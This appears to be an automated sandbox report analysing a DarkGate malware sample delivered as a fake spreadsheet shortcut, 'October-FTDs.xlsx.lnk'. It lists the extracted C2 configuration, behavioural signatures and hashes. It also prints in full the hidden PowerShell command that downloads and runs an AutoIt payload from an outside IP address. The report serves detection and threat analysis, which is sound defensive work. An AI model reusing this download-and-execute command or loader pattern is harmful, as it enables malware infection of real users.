Analysis
-
max time kernel
310s -
max time network
400s -
platform
windows10-1703_x64 -
resource
win10-20231023-en -
resource tags
arch:x64arch:x86image:win10-20231023-enlocale:en-usos:windows10-1703-x64system -
submitted
26-10-2023 23:22
Static task
static1
Behavioral task
behavioral1
Sample
October-FTDs.xlsx.lnk
Resource
win10-20231023-en
General
-
Target
October-FTDs.xlsx.lnk
-
Size
1KB
-
MD5
f0a7c9b3858cfda3f16de7fa7a7958a8
-
SHA1
8777be6f9c0806cbd82cdac30a38403ebe2187de
-
SHA256
06cc011f34188a2156c18c1307fd625ac9a2ed916a4c7e01b40513a826bd24d0
-
SHA512
6258cd5da428864b0af3f96d1fce28a1efa04cf4d309bf65744e4c205b95a932ef69778b0fe61939c8d9736271b33c375f18e36785dc2e2888316248b723157d
Malware Config
Extracted
darkgate
civilian1111
http://185.130.226.220
-
alternative_c2_port
8080
-
anti_analysis
true
-
anti_debug
true
-
anti_vm
true
-
c2_port
2351
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_rawstub
true
-
crypto_key
vsAuhYDgOqBrvG
-
internal_mutex
txtMut
-
minimum_disk
100
-
minimum_ram
4096
-
ping_interval
5
-
rootkit
true
-
startup_persistence
true
-
username
civilian1111
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 1 5000 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 2216 AutoIt3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AutoIt3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AutoIt3.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 5000 powershell.exe 5000 powershell.exe 5000 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 5000 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 748 wrote to memory of 5000 748 cmd.exe 72 PID 748 wrote to memory of 5000 748 cmd.exe 72 PID 5000 wrote to memory of 2216 5000 powershell.exe 73 PID 5000 wrote to memory of 2216 5000 powershell.exe 73 PID 5000 wrote to memory of 2216 5000 powershell.exe 73
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\October-FTDs.xlsx.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "&{ Invoke-WebRequest -Uri "http:/\194.26.192.233/AutoIt3.exe" -OutFile "C:\Users\Public\AutoIt3.exe"; Invoke-WebRequest -Uri "http:/\194.26.192.233/bone.au3" -OutFile "C:\Users\Public\bone.au3"; Invoke-WebRequest -Uri "http://194.26.192.233/document.xlsx" -OutFile "C:\Users\Public\Documents\document.xlsx"; "C:\Users\Public\AutoIt3.exe C:\Users\Public\bone.au3"; C:\Users\Public\Documents\document.xlsx }"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Users\Public\AutoIt3.exe"C:\Users\Public\AutoIt3.exe" C:\Users\Public\bone.au33⤵
- Executes dropped EXE
- Checks processor information in registry
PID:2216
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
489KB
MD5df26679034f7cb5a69fd065e54dc5fc0
SHA14a7a998ac1f903378f446d902f1be05c23772965
SHA2567f0624141092f91ca74a6bf5c51408b445224ed6e504329acb04fee609a897cd
SHA51281f41adf9bd72fe51ae8c3f4914c30d4533594afb1f11438d389319fa94a9fac691cd718c2cb1ab75cc2d877805a8c899af6d0dd5ad1b2634c2fd7fc5ad326eb